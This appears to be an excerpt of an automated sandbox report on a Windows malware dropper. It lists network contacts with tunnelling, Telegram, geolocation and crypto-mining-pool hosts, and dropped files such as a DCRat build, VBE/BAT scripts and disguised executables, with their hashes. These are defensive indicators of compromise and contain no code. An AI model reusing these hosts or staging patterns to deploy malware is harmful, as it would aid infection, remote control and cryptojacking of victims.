US 8.8.8.8:53 nodejs.org udp
US 104.20.23.46:443 nodejs.org tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 article-coal.gl.at.ply.gg udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 21.221.185.147.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 52.133.105.77.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 papka.top udp
US 172.67.169.72:80 papka.top tcp
US 172.67.169.72:80 papka.top tcp
US 8.8.8.8:53 72.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 39.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
IE 52.111.236.21:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
FI 77.105.133.52:80 ozero.top tcp

Files

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

MD5 d25ebdfc04bdadea74017fa72f90781f
SHA1 f7278c4d04fc4db888368e0245d7607d8bcbb557
SHA256 9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
SHA512 77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

MD5 54276fc2dfafc0b610f08ba739a0f5ee
SHA1 dc61f3b768f2b1423c949d0ce761606f594aee8c
SHA256 9bb53f37a4b196c0031047936fbf6f029aa845d4610e77cabed1d370f04f229b
C:\Users\Admin\AppData\Local\Temp\Result.exe

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

C:\Users\Admin\AppData\Local\Temp\solara.exe

C:\winNet\we9fgyC144zVOkGk.vbe

C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

C:\Windows\Installer\MSID34E.tmp

C:\Windows\Installer\MSID39E.tmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jlnrlnf2.4sw.ps1

C:\Users\Admin\AppData\Local\Temp\QgayOGv9z8.bat

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Windows\Installer\MSIF05F.tmp

C:\Windows\xdwd.dll

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Refcrt.exe.log

C:\Users\Public\AccountPictures\upfc.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

C:\Users\Admin\AppData\Local\Temp\TVSs4LmGCN

C:\Users\Admin\AppData\Local\Temp\M8NaZBdXZD

C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

C:\Users\Admin\AppData\Local\Temp\EtV2Ktt2V7

C:\Users\Admin\AppData\Local\Temp\onFIzuzEuF

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts